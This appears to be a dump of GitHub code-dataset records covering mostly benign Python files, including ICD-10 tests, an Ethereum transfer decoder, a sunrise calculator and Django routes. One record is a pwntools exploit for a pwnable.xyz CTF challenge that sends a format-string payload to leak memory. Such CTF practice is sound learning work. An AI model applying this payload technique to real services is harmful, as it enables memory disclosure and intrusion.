cat_file_path):\n super(EvalProcessor, self).__init__()\n self.cats = []\n with open(cat_file_path) as fin:\n for line in fin.read().strip().split(\"\\n\"):\n self.cats.append(line.strip())\n\n def get_examples(self, filepath):\n \"\"\"See base class.\"\"\"\n \"\"\"\n filepath: the file of the evaluation dataset \n \"\"\"\n examples = []\n labels = []\n i = 0\n with open(filepath) as fin:\n lines = fin.read().strip().split(\"\\n\")\n for line in tqdm(lines):\n line = line.strip().split(\",\", 1)\n if line[0].startswith(\"'\") or line[0].startswith('\"'):\n line[0] = line[0][1:-1]\n label = int(line[0]) - 1\n text = \" \".join(line[1][1:-1].split()[:128])\n if text.strip() == \"\":\n text = \"N/A\"\n for cat in self.cats:\n i += 1\n if cat == self.cats[label]:\n examples.append(InputExample(guid=i, text_a=cat, text_b=text, label=1))\n else:\n examples.append(InputExample(guid=i, text_a=cat, text_b=text, label=0))\n\n return examples\n\n def get_labels(self):\n return [0, 1]\n\nprocessors = {\n \"natcat\": NatcatProcessor,\n \"eval\": EvalProcessor,\n}\n\noutput_modes = {\n \"natcat\": \"classification\",\n \"eval\": \"classification\",\n}\n\ndef simple_accuracy(preds, labels):\n return (preds == labels).mean()\n\ndef compute_metrics(task_name, preds, labels):\n if task_name in [\"wikicat\"]:\n return {\"acc\": simple_accuracy(preds, labels)}\n if task_name in [\"eval\"]:\n return {\"acc\": simple_accuracy(preds, labels)}\n\nclass DataFiles:\n def __init__(self, directory):\n self.all_files = [os.path.join(directory, f) for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f)) and f.endswith(\".data\")]\n self.todo_files = self.all_files\n\n def next(self):\n if len(self.todo_files) == 0:\n return None\n return self.todo_files.pop()\n\n def save(self, file_path):\n with open(file_path, \"w\") as fout:\n for f in self.todo_files:\n fout.write(f + \"\\n\")\n\n def load(self, file_path):\n self.todo_files = []\n with open(file_path) as fin:\n for f in fin:\n self.todo_files.append(f.strip())\n\n\n","repo_name":"ZeweiChu/ULR","sub_path":"single-encoder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"2672656768","text":"import os\nimport random\nfrom difflib import SequenceMatcher\n\nimport hypothesis\nimport hypothesis.strategies as st\nimport pytest\nimport requests\nimport untangle\nfrom hypothesis import assume, given, settings\n\nfrom icd.base import ICDChapter, ICDEntry\nfrom icd.rev10cm import (ICD10CMBlock, ICD10CMCategory, ICD10CMChapter,\n ICD10CMRoot, download_from_CDC, get_codex)\n\n\n@pytest.fixture(params=[\"2019\", \"2020\", \"2021\", \"2022\"], scope=\"session\")\ndef codex(request):\n return get_codex(release=request.param)\n\n\n@given(\n chapter_num=st.integers(1,3000),\n start_code=st.characters(min_codepoint=65, max_codepoint=90),\n mid_code=st.characters(min_codepoint=65, max_codepoint=90),\n end_code=st.characters(min_codepoint=65, max_codepoint=90)\n)\n@settings(suppress_health_check=hypothesis.HealthCheck.all())\ndef test_entry(chapter_num, start_code, mid_code, end_code):\n \"\"\"\n Test basic functionalities of the individual ICD-10-CM entries.\n \"\"\"\n assume(start_code <= mid_code < end_code)\n release = \"testrelease\"\n root = ICD10CMRoot(release=release)\n chapter = ICD10CMChapter(chapter_num, \"Test Chapter\")\n block = ICD10CMBlock(code=f\"{start_code}-{end_code}\", title=\"Test Block\")\n sub_block1 = ICD10CMBlock(code=mid_code, title=\"Test Subblock 1\")\n sub_block2 = ICD10CMBlock(\n code=chr(ord(mid_code) + 1),\n title=\"Test Subblock 2\"\n )\n category = ICD10CMCategory(f\"{mid_code}.1\", \"Test category\")\n\n root.add_child(chapter)\n chapter.add_child(block)\n assert block.should_contain(sub_block1), \"Block should contain sub block 1\"\n block.add_child(sub_block1)\n assert root.tree(print_out=False) == sub_block1.ancestry(print_out=False), (\n \"For linear tree, `tree()` and `ancestry()` must be same\"\n )\n assert block.should_contain(sub_block2), \"Block should contain sub block 2\"\n block.add_child(sub_block2)\n sub_block1.add_child(category)\n\n assert root.exists(chapter.code), \"chapter doesn't seem to exist\"\n assert chapter in root.search(chapter.code), \"Didn't find chapter\"\n with pytest.raises(AttributeError):\n _ = root.chapter\n with pytest.raises(AttributeError):\n _ = root.block\n with pytest.raises(AttributeError):\n _ = chapter.block\n\n assert root.exists(block.code), \"block doesn't seem to exist\"\n assert block in root.search(block.code), \"Didn't find block\"\n assert block.chapter == chapter, \"Block's chapter wrong\"\n\n assert root.exists(sub_block1.code), \"sub block 1 doesn't seem to exist\"\n assert sub_block1 in root.search(sub_block1.code), \"Didn't find sub_block1\"\n assert sub_block1.chapter == chapter, \"Sub block 1's chapter wrong\"\n\n assert root.exists(sub_block2.code), \"sub block 2 doesn't seem to exist\"\n assert sub_block2 in root.search(sub_block2.code), \"Didn't find sub_block2\"\n assert sub_block2.chapter == chapter, \"Sub block 2's chapter wrong\"\n\n assert root.exists(category.code), \"category doesn't seem to exist\"\n assert category in root.search(category.code), \"Didn't find category\"\n assert category.chapter == chapter, \"Category's chapter wrong\"\n assert category.block == sub_block1, \"Category's block wrong\"\n\n assert chapter in root.children, \"Chapter isn't child of root\"\n assert block in chapter.children, \"Block isn't child of chapter\"\n assert sub_block1 in block.children, \"Sub block 1 isn't child of block\"\n assert sub_block2 in block.children, \"Sub block 2 isn't child of block\"\n\n assert chapter.parent == root, \"Root isn't parent of chapter\"\n assert block.parent == chapter, \"Chapter isn't parent of block\"\n assert sub_block1.parent == block, \"Block isn't parent of sub block 1\"\n assert sub_block2.parent == block, \"Block isn't parent of sub block 2\"\n\n block.remove_child(sub_block2)\n\n assert sub_block2.parent is None, \"Removed child still has parent\"\n assert sub_block2 not in block.children, \"Removed child is still child\"\n\n chapter.add_child(sub_block2)\n\n assert sub_block2 not in chapter.children, (\n \"sub block 2 should have been added to the block, not the chapter\"\n )\n assert sub_block2 in block.children, \"sub block 2 schould be block's child\"\n assert sub_block2.parent == block, \"Sub block 2 parent is not block\"\n\n\ndef test_entries(codex):\n entries = list(codex.entries)\n entry_subset = random.sample(entries, k=100)\n revision = \"10-CM\"\n release = codex.release\n\n for entry in entry_subset:\n assert codex.exists(entry.code), \"entry does not seem to exist\"\n assert entry in codex.search(entry.code), \"entry not in search results\"\n assert entry.revision == revision, \"Not all entries have same revision\"\n assert entry.release == release, \"Not all entries have the same release\"\n assert entry.root == codex, \"Root of entries must be codex root\"\n assert all([child.parent == entry for child in entry.children]), (\n \"All entrie's children must have entry as parent.\"\n )\n sum_len_children = sum([len(child) for child in entry.children])\n assert len(entry) == sum_len_children + 1, (\n \"Length of entry must match sum of length of children + 1\"\n )\n if entry.depth_in_kind > 1:\n assert type(entry.parent) == type(entry), (\n \"If `depth_in_kind` is larger than 1, parent and child must be \"\n \"same type.\"\n )\n tree_str = entry.tree(print_out=False)\n num_lines = tree_str.count(\"\\n\")\n assert num_lines == len(list(entry.entries)), (\n \"Tree must list all entries under current\"\n )\n\n\ndef test_request(codex):\n \"\"\"\n Test whether the ICD API request works. Run this test only for the\n latest ICD-10-CM release. Apparently, some entries are stored differently\n on the CDC API than in the data they release, which is why some 'fuzzy'\n testing is required.\n \"\"\"\n if codex.release == \"2022\":\n leaves = list(codex.leaves)\n leaf_subset = random.sample(leaves, k=10)\n\n for leaf in leaf_subset:\n response_list = leaf.request()\n for response in response_list:\n assert leaf.code in response[0], (\n \"Responded code not same as leaf code\"\n )\n leaf_title = leaf.title.lower()\n response_title = response[1].lower()\n seqmatch = SequenceMatcher(None, leaf_title, response_title)\n assert leaf_title in response_title or seqmatch.ratio() >= 0.8, (\n f\"Responded title: {response_title}, \"\n f\"Stored title: {leaf_title}\"\n )\n\n\ndef test_root(codex):\n root = codex\n assert isinstance(root, ICD10CMRoot), \"Root must be `ICD10CMRoot` object.\"\n assert root.code == \"ICD-10-CM root\", \"Root has wrong code\"\n exp_title = (\n \"International Classification of Diseases, Tenth Revision, Clinical \"\n f\"Modification, {root.release} release\"\n )\n assert root.title == exp_title, \"Root has wrong title\"\n assert all([isinstance(child, ICD10CMChapter) for child in root.children]), (\n \"All children of root entry must be chapters\"\n )\n assert root.kind == \"root\"\n assert root.parent is None, \"Root cannot have parents.\"\n assert root.is_root, \"Root must have `is_root == True`.\"\n assert not root.is_leaf, \"Root cannot be leaf.\"\n assert root.root == root, \"Root of root must be root.\"\n assert hasattr(root, \"chapters\")\n for code, chapter in root.chapters.items():\n assert chapter.code == code, \"Chapters dict of root incorrect\"\n\n\ndef test_chapter(codex):\n chapters = codex.children\n for chapter in chapters:\n assert isinstance(chapter, ICD10CMChapter), (\n \"Chapter must be instance of `ICD10CMChapter`\"\n )\n assert chapter.kind == \"chapter\", \"Chapter must be of kind 'chapter'\"\n assert all([isinstance(child, ICD10CMBlock) for child in chapter.children]), (\n \"Children of chapters must be blocks\"\n )\n assert isinstance(chapter.parent, ICD10CMRoot), (\n \"Parent of chapter must be root\"\n )\n assert hasattr(chapter, \"blocks\")\n for code, block in chapter.blocks.items():\n assert block.code == code, \"Blocks dict of chapter incorrect\"\n\n\ndef test_codex(codex):\n \"\"\"\n Test some core functionalities of a loaded codex.\n \"\"\"\n assert isinstance(codex, ICD10CMRoot), (\n \"`get_codex()` did not return root object\"\n )\n assert all([isinstance(child, ICDChapter) for child in codex.children]), (\n \"Children of root must be chapters\"\n )\n len_codex = len(codex)\n assert len_codex > 1, \"Codex contains only root entry\"\n assert len_codex == len(list(codex.entries)), (\n \"`len` does not seem to report number of entries\"\n )\n assert len_codex >= len(list(codex.leaves)), (\n \"Codex must have more entries than leaves\"\n )\n assert all([leaf.is_leaf for leaf in codex.leaves]), (\n \"Iterator over leaves returned objects that aren't leaves\"\n )\n assert all([isinstance(entry, ICDEntry) for entry in codex.entries]), (\n \"Not all entries are ICD objects\"\n )\n\n\n@pytest.mark.parametrize(\"release\", [\"2019\", \"2020\", \"2021\", \"2022\"])\ndef test_download_from_CDC(tmpdir, release):\n \"\"\"\n Make sure downloading from the CDC website works.\n \"\"\"\n with pytest.raises(requests.RequestException):\n download_from_CDC(custom_url=\"https://made.up/file.xml\")\n\n with pytest.raises(IOError):\n download_from_CDC(save_path=\"/made/up/path\")\n\n download_from_CDC(release=release, save_path=tmpdir)\n tmp_file_path = tmpdir / f\"icd10cm_tabular_{release}.xml\"\n assert os.path.exists(str(tmp_file_path)), (\n f\"Temporary directory {tmp_file_path} does not exist\"\n )\n xml_root = untangle.parse(tmp_file_path).ICD10CM_tabular\n codex = ICD10CMRoot.from_xml(xml_root)\n assert isinstance(codex, ICD10CMRoot), (\n \"Codex was not created\"\n )\n","repo_name":"rmnldwg/icd","sub_path":"tests/rev10cm_test.py","file_name":"rev10cm_test.py","file_ext":"py","file_size_in_byte":10065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"133017008","text":"from typing import List\n\nfrom ethtx.models.decoded_model import DecodedCall, DecodedTransfer, AddressInfo\nfrom ethtx.utils.measurable import RecursionLimit\nfrom .abc import ABISubmoduleAbc\n\nRECURSION_LIMIT = 2000\nZERO_ADDRESS = \"0x\" + 40 * \"0\"\n\n\nclass ABITransfersDecoder(ABISubmoduleAbc):\n \"\"\"Abi Transfers Decoder.\"\"\"\n\n def decode(self, call: DecodedCall, events, proxies) -> List:\n \"\"\"Decode transfers.\"\"\"\n transfers = []\n\n def _transfers_calls(decoded_call):\n if decoded_call.status and decoded_call.value:\n transfers.append(\n DecodedTransfer(\n from_address=decoded_call.from_address,\n to_address=decoded_call.to_address,\n token_standard=\"ETH\",\n token_address=ZERO_ADDRESS,\n token_symbol=\"ETH\",\n value=decoded_call.value,\n )\n )\n if decoded_call.subcalls:\n for sub_call in decoded_call.subcalls:\n _transfers_calls(sub_call)\n\n if call:\n with RecursionLimit(RECURSION_LIMIT):\n _transfers_calls(call)\n\n for event in events:\n # signatures of Transfer event valid for ERC20 and ERC721 and\n # TransferSingle for ERC1155\n if event.event_signature in (\n \"0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef\",\n \"0xc3d58168c5ae7397731d063d5bbf3d657854427343f4c083240f7aacaa2d0f62\",\n ):\n # Transfer event\n if (\n event.event_signature\n == \"0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef\"\n ):\n from_address = \"0x\" + event.parameters[0].value[-40:]\n to_address = \"0x\" + event.parameters[1].value[-40:]\n token_id = event.parameters[2].value\n value = event.parameters[2].value\n # TransferSingle event\n else:\n from_address = \"0x\" + event.parameters[1].value[-40:]\n to_address = \"0x\" + event.parameters[2].value[-40:]\n token_id = event.parameters[3].value\n value = event.parameters[4].value\n\n from_name = self._repository.get_address_label(\n event.chain_id, from_address, proxies\n )\n to_name = self._repository.get_address_label(\n event.chain_id, to_address, proxies\n )\n\n standard = self._repository.get_standard(\n event.chain_id, event.contract.address\n )\n\n if (\n event.event_signature\n == \"0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef\"\n and (standard == \"ERC20\" or event.contract.address in proxies)\n ):\n (\n _,\n token_symbol,\n token_decimals,\n _,\n ) = self._repository.get_token_data(\n event.chain_id, event.contract.address, proxies\n )\n try:\n value = value / 10**token_decimals\n except:\n value = 0\n\n transfers.append(\n DecodedTransfer(\n from_address=AddressInfo(\n address=from_address, name=from_name\n ),\n to_address=AddressInfo(address=to_address, name=to_name),\n token_standard=standard,\n token_address=event.contract.address,\n token_symbol=token_symbol,\n value=value,\n )\n )\n else:\n (\n _,\n token_symbol,\n token_decimals,\n _,\n ) = self._repository.get_token_data(\n event.chain_id, event.contract.address, proxies\n )\n\n if (\n event.event_signature\n == \"0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef\"\n ):\n value = 1\n else:\n value = int(value, 16) if type(value) == str else value\n\n if token_symbol == \"Unknown\":\n token_symbol = \"NFT\"\n\n if len(str(token_id)) > 8:\n token_symbol = (\n f\"{token_symbol} {str(token_id)[:6]}...\"\n f\"{str(token_id)[-2:]}\"\n )\n else:\n token_symbol = f\"{token_symbol} {token_id}\"\n token_address = f\"{event.contract.address}?a={token_id}#inventory\"\n transfers.append(\n DecodedTransfer(\n from_address=AddressInfo(\n address=from_address, name=from_name\n ),\n to_address=AddressInfo(address=to_address, name=to_name),\n token_standard=standard,\n token_address=token_address,\n token_symbol=token_symbol,\n value=value,\n )\n )\n\n return transfers\n","repo_name":"EthTx/ethtx","sub_path":"ethtx/decoders/abi/transfers.py","file_name":"transfers.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","stars":444,"dataset":"github-code","pt":"76"} +{"seq_id":"39763923522","text":"#!/usr/bin/python3\n\nimport ezodf\nimport json\n\ndata = []\n\nspreadsheet = ezodf.opendoc('Kartoj_Listo.ods')\nsheet = spreadsheet.sheets[0]\nfor row in sheet.rows():\n\tdata_row = []\n\tfor cell in row:\n\t\tdata_row.append(cell.value)\n\tdata.append(data_row);\n\nprint(json.dumps(data))\n","repo_name":"mschmitt/JustOne-NurUnu","sub_path":"kartoj2json.py","file_name":"kartoj2json.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"69815707447","text":"\"\"\"\r\nsunrise/sunset calculation module\r\ncode adapted from:\r\n https://en.wikipedia.org/wiki/Sunrise_equation#Generalized_equation\r\n and\r\n https://gml.noaa.gov/grad/solcalc/solareqns.PDF\r\n\"\"\"\r\n\r\nimport datetime\r\nfrom math import sin, cos, tan, acos, pi\r\n\r\nfrom .geo import get_client_ip_address, get_latlong_from_ip_address\r\n\r\n\r\ndef is_leap(year):\r\n \"\"\" returns whether year is a leap year \"\"\"\r\n\r\n return (year % 4 == 0 and year % 100 != 0) or year % 400 == 0\r\n\r\ndef get_fractional_year(timetuple=None):\r\n \"\"\" calculates fractional year (gamma) \"\"\"\r\n\r\n if timetuple is None:\r\n timetuple = datetime.datetime.now().timetuple()\r\n day_of_year = timetuple.tm_yday\r\n hour = timetuple.tm_hour\r\n days_in_year = 365 + (1 if is_leap(timetuple.tm_year) else 0)\r\n return 2 * pi / days_in_year * (day_of_year - 1 + (hour - 12) / 24)\r\n\r\ndef get_equation_of_time(gamma):\r\n \"\"\" estimates eq of time in minutes \"\"\"\r\n\r\n return 229.18*(0.000075 + 0.001868 * cos(gamma) - 0.032077 * sin(gamma) - \\\r\n 0.014615 * cos(2 * gamma) - 0.040849 * sin(2 * gamma))\r\n\r\ndef get_solar_declination_angle(gamma):\r\n \"\"\" estimates solar declination angle in radians \"\"\"\r\n\r\n return 0.006918 - 0.399912 * cos(gamma) + 0.070257 * sin(gamma) - \\\r\n 0.006758 * cos(2 * gamma) + 0.000907 * sin(2 * gamma) - \\\r\n 0.002697 * cos(3 * gamma) + 0.00148 * sin(3 * gamma)\r\n\r\ndef get_sunrise_hour_angle(latitude, decl):\r\n \"\"\" calculates hour angle at sunrise in radians \"\"\"\r\n return acos((cos(90.833 * pi / 180) / (cos(latitude * pi / 180) * cos(decl))) - \\\r\n tan(latitude * pi / 180) * tan(decl))\r\n\r\ndef get_sunrise(longitude, hour_angle, eqtime):\r\n \"\"\" gets time of sunrise in minutes \"\"\"\r\n\r\n return 720 - 4 * (longitude + hour_angle * 180 / pi) - eqtime\r\n\r\ndef get_sunset(longitude, hour_angle, eqtime):\r\n \"\"\" gets time of sunset in minutes\"\"\"\r\n\r\n return 720 - 4 * (longitude - hour_angle * 180 / pi) - eqtime\r\n\r\ndef raw_minutes_to_time(mins, utc):\r\n \"\"\" converts raw minutes to hour:min with utc shift \"\"\"\r\n\r\n hour = mins / 60 + utc\r\n mins = int(60 * (hour - int(hour)))\r\n hour = int(hour)\r\n if mins < 10:\r\n mins = '0' + str(mins)\r\n return f'{hour}:{mins}'\r\n\r\ndef formatted_local_setrise(utc):\r\n \"\"\" returns tuple for (rise, set) \"\"\"\r\n\r\n latlong_tuple = get_latlong_from_ip_address(get_client_ip_address())\r\n if latlong_tuple is None:\r\n return None\r\n latitude, longitude, = latlong_tuple\r\n gamma = get_fractional_year()\r\n decl = get_solar_declination_angle(gamma)\r\n eqtime = get_equation_of_time(gamma)\r\n hour_angle = get_sunrise_hour_angle(latitude, decl)\r\n rise_mins = get_sunrise(longitude, hour_angle, eqtime)\r\n set_mins = get_sunset(longitude, hour_angle, eqtime)\r\n\r\n return raw_minutes_to_time(rise_mins, utc), raw_minutes_to_time(set_mins, utc)\r\n","repo_name":"jackdonofrio/alarmpi","sub_path":"utils/sun.py","file_name":"sun.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73518816246","text":"import os\nimport subprocess\nimport sys\nimport unittest\nimport platform\n\n\nclass BlackFormattingTest(unittest.TestCase):\n def test_black_formatting(self):\n root_dir = os.path.normpath(os.path.join(__file__, \"..\"))\n res = subprocess.run(\n [\n self.get_black_path(),\n root_dir,\n \"--check\",\n \"--extend-exclude\",\n \"pytest-envs\",\n ],\n capture_output=True,\n )\n if res.returncode != 0:\n print(res.stdout.decode())\n print(res.stderr.decode(), file=sys.stderr)\n self.fail(\n (\n \"Not all python files are correctly formatted. \"\n \"Run 'python -m black ' to autoformat the files.\\n\"\n + res.stderr.decode()\n )\n )\n\n def get_black_path(self):\n folder_name = \"Scripts\" if platform.system() == \"Windows\" else \"bin\"\n return os.path.join(sys.prefix, folder_name, \"black\")\n","repo_name":"knime/knime-python","sub_path":"test_black_formatting.py","file_name":"test_black_formatting.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"76"} +{"seq_id":"35286017849","text":"from distutils.core import setup, Extension\nimport platform\n\n# original version\nVERSION=\"0.5\"\n\n# get current version\nwith open('brenda/version.py') as f:\n exec(f.read())\n\next_modules = []\n\nif platform.system() == 'Linux':\n ext_modules = [ Extension(\"paracurl\", [\"paracurl/paracurl.c\"],\n libraries=['curl']) ]\n\nsetup(name = \"Brenda\",\n version = VERSION,\n packages = [ 'brenda' ],\n scripts = [ 'brenda-work', 'brenda-tool', 'brenda-run', 'brenda-node', 'brenda-ebs' ],\n ext_modules = ext_modules,\n\n data_files=[('brenda/task-scripts', ['task-scripts/frame', 'task-scripts/subframe']),\n ('brenda/doc', ['README.md', 'doc/brenda-talk-blendercon-2013.pdf'])],\n\n author = \"James Yonan\",\n author_email = \"james@openvpn.net\",\n description = \"Blender render farm tool for Amazon Web Services\",\n)\n","repo_name":"jamesyonan/brenda","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"76"} +{"seq_id":"10770969090","text":"from mmcv.runner import HOOKS, Hook\nfrom torch.nn.utils import clip_grad\nimport torch\n\n\n@HOOKS.register_module()\nclass AccumulateOptimizerHook(Hook):\n\n def __init__(self, grad_clip=None, accumulate_factor=1, detect_anomaly=False):\n self.grad_clip = grad_clip\n assert isinstance(accumulate_factor, int)\n self.accumulate_factor = accumulate_factor\n self.detect_anomaly = detect_anomaly\n\n def clip_grads(self, params):\n params = list(\n filter(lambda p: p.requires_grad and p.grad is not None, params))\n if len(params) > 0:\n return clip_grad.clip_grad_norm_(params, **self.grad_clip)\n\n def after_train_iter(self, runner):\n if self.accumulate_factor == 1:\n runner.optimizer.zero_grad()\n if self.detect_anomaly:\n with torch.autograd.detect_anomaly():\n runner.outputs['loss'].backward()\n else:\n runner.outputs['loss'].backward()\n if self.grad_clip is not None:\n grad_norm = self.clip_grads(runner.model.parameters())\n if grad_norm is not None:\n # Add grad norm to the logger\n runner.log_buffer.update({'grad_norm': float(grad_norm)},\n runner.outputs['num_samples'])\n runner.optimizer.step()\n else:\n runner.outputs['loss'] = runner.outputs['loss'] / self.accumulate_factor\n if self.detect_anomaly:\n with torch.autograd.detect_anomaly():\n runner.outputs['loss'].backward()\n else:\n runner.outputs['loss'].backward()\n\n if (runner.iter + 1) % self.accumulate_factor == 0:\n if self.grad_clip is not None:\n grad_norm = self.clip_grads(runner.model.parameters())\n if grad_norm is not None:\n # Add grad norm to the logger\n runner.log_buffer.update({'grad_norm': float(grad_norm)},\n runner.outputs['num_samples'])\n runner.optimizer.step()\n runner.optimizer.zero_grad()\n","repo_name":"yongbin-buaa/bmvc22","sub_path":"mmocr/hooks/accumulate_optimizer_hook.py","file_name":"accumulate_optimizer_hook.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"37834924519","text":"#from run_bot import get_photos\n\n\nCATEG_LIST = 'Круто!\\n' \\\n 'Выбери категорию:\\n' \\\n '1.Самолеты\\n' \\\n '2.Животные\\n' \\\n '3.Птицы\\n' \\\n '4.Другое'\n\nPLANE_LIST = ['Введи цифру:\\n'\n '0.Все\\n'\n '1.Простые самолеты\\n'\n '',\n {''}]\nSHIPS_LIST = ''\nANIMALS_LIST = ['Введи число:\\n'\n '20.Все\\n'\n '21.Простые модели\\n'\n '22.Сложные модели\\n'\n '23.Составные модели', '258234980'] # put animals album id here\nFLOWERS_LIST = ''\nBIRDS_LIST = ''\nBOXES_LIST = ''\nBASE_LIST = ''\n","repo_name":"vlad-ostas/Innokentiy","sub_path":"ORIGAMI.py","file_name":"ORIGAMI.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22845983592","text":"import unittest\n\nfrom aistore.sdk.errors import InvalidObjectRangeIndex\nfrom aistore.sdk.multiobj import ObjectRange\nfrom tests.unit.sdk.test_utils import test_cases\n\n\n# pylint: disable=unused-variable\nclass TestObjectRange(unittest.TestCase):\n def setUp(self):\n self.prefix = \"prefix-\"\n self.suffix = \"-suffix\"\n self.min_index = 4\n self.max_index = 9\n self.pad_width = 3\n self.step = 2\n\n def test_object_range_defaults(self):\n object_range = ObjectRange(\n prefix=self.prefix, min_index=self.min_index, max_index=self.max_index\n )\n self.assertEqual(\"prefix-{4..9..1}\", str(object_range))\n\n def test_object_range(self):\n object_range = ObjectRange(\n prefix=self.prefix,\n min_index=self.min_index,\n max_index=self.max_index,\n pad_width=self.pad_width,\n step=self.step,\n suffix=self.suffix,\n )\n self.assertEqual(\"prefix-{004..009..2}-suffix\", str(object_range))\n\n def test_object_range_prefix_only(self):\n object_range = ObjectRange(prefix=self.prefix)\n self.assertEqual(\"prefix-\", str(object_range))\n\n def test_object_range_invalid_suffix(self):\n with self.assertRaises(ValueError):\n ObjectRange(prefix=self.prefix, suffix=\"anything\")\n\n @test_cases(\n (1, 25, 0, True),\n (25, 1, 0, False),\n (20, 25, 1, False),\n (None, 25, 1, False),\n (0, None, 1, False),\n (20, 25, 2, True),\n (20, 25, 3, True),\n )\n def test_validate_indices(self, test_case):\n min_index, max_index, pad_width, valid = test_case\n if valid:\n ObjectRange(\n prefix=self.prefix,\n min_index=min_index,\n max_index=max_index,\n pad_width=pad_width,\n )\n return\n with self.assertRaises(InvalidObjectRangeIndex):\n ObjectRange(\n prefix=self.prefix,\n min_index=min_index,\n max_index=max_index,\n pad_width=pad_width,\n )\n\n def test_iter(self):\n object_range = ObjectRange(\n prefix=self.prefix,\n min_index=self.min_index,\n max_index=self.max_index,\n pad_width=self.pad_width,\n step=self.step,\n suffix=self.suffix,\n )\n expected_range = [\"prefix-004-suffix\", \"prefix-006-suffix\", \"prefix-008-suffix\"]\n self.assertEqual(expected_range, list(object_range))\n","repo_name":"NVIDIA/aistore","sub_path":"python/tests/unit/sdk/multiobj/test_object_range.py","file_name":"test_object_range.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":948,"dataset":"github-code","pt":"76"} +{"seq_id":"21285089572","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'forum'\n\n\nurlpatterns = [\n\n # /forum/\n url(r'^$', views.IndexView.as_view(), name='index'),\n\n # /forum/read\n url(r'^read/$', views.ReadView.as_view(), name='read'),\n\n # /forum/profile\n url(r'^profile/$', views.MyView.as_view(), name='profile'),\n\n # /forum/id\n url(r'^(?P[0-9]+)$', views.DetailView.as_view(), name='detail'),\n\n # /forum/question/add\n url(r'question/add/$', views.QuestionCreate.as_view(), name='question-add'),\n\n # /forum/question/pk\n url(r'question/(?P[0-9]+)/$', views.QuestionUpdate.as_view(), name='question-update'),\n\n # /forum/question/pk/delete\n url(r'question/(?P[0-9]+)/delete/$', views.QuestionDelete.as_view(), name='question-delete'),\n\n # /forum/question/pk/ans\n url(r'question/(?P[0-9]+)/ans/$', views.AnswerCreate.as_view(), name='answer-add'),\n\n # /forum/answer/update/pk\n url(r'answer/update/(?P[0-9]+)/$', views.AnswerUpdate.as_view(), name='answer-update'),\n\n # /forum/answer//delete/pk\n url(r'answer/delete/(?P[0-9]+)/$', views.AnswerDelete.as_view(), name='answer-delete'),\n\n # /forum/register\n url(r'^register/$',views.UserFormView.as_view(), name='register'),\n\n # /forum/logout\n url(r'^forum/logout/$', 'django.contrib.auth.views.logout', {'next_page': '/forum/login'}, name='logout'),\n\n # /forum/login\n url(r'^login/$', views.login_user, name='login'),\n\n # /forum/maker\n url(r'^maker/$', views.update_profile, name='adminMaker'),\n\n\n]\n","repo_name":"shagunbandi/Q-A-Website","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18045745913","text":"#!/usr/bin/python\nfrom pwn import *\nimport re\n\nfinder = re.compile(\"0x[0-9a-f]+\")\n\n# proc = process(\"./GrownUpRedist\")\nproc = remote(\"svc.pwnable.xyz\", 30004)\n\ncontext.terminal = ['tmux', 'splitw', '-v']\n# gdb.attach(proc)\n\n# raw_input(\"Waiting for first input..\")\n\nprint(proc.read())\nproc.write('y' * 8 + p64(0x601080))\n# proc.writeline(\"YYYY\")\n\nprint(proc.read())\n# 5 for bypass registers, 3 for stacks\nf_string = \"%c\" * 5 + \"%c\" * 3 + \"%s\"\nproc.write('A' * 32 + f_string + 'A' * (0x80 - 32 - len(f_string)))\n\nret = proc.read()\nprint(ret)\n\n# raw_list = finder.findall(ret)\n#\n# for hex_string in raw_list :\n# print(\"Trying %s\" % hex_string)\n# try :\n# print(hex_string[2:].decode(\"hex\"))\n# except :\n# pass\n\nproc.interactive()\n\n","repo_name":"KwonL/CTF-practice","sub_path":"2019/pwnable_xyz/05_GrownUp/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11557404114","text":"import Guess\nimport Hangman\n\ndef choosing_game():\n print('*' * 20)\n print(' Choose your game')\n print('*' * 20)\n\n print('(1) Hangman Game (2) Guessing Game ')\n\n game = int(input(\"Which game will you play ? \"))\n\n if game == 1:\n print(\"Playing Hangman Game...\\n\")\n Hangman.playing()\n elif game == 2:\n print(\"Playing Guessing Game...\\n\")\n Guess.playing()\n\nif (__name__ == \"__main__\"):\n choosing_game()\n","repo_name":"Vinicius-2003/PythonIniciante","sub_path":"Jogo/jogos.py","file_name":"jogos.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11350876669","text":"import operator\nimport select\nimport socket\nfrom collections import namedtuple\nfrom . import protocol, client\nfrom ..naivechain import base\nfrom ..naivechain import blockchain\nfrom ..naivechain import block\n\n\nclass 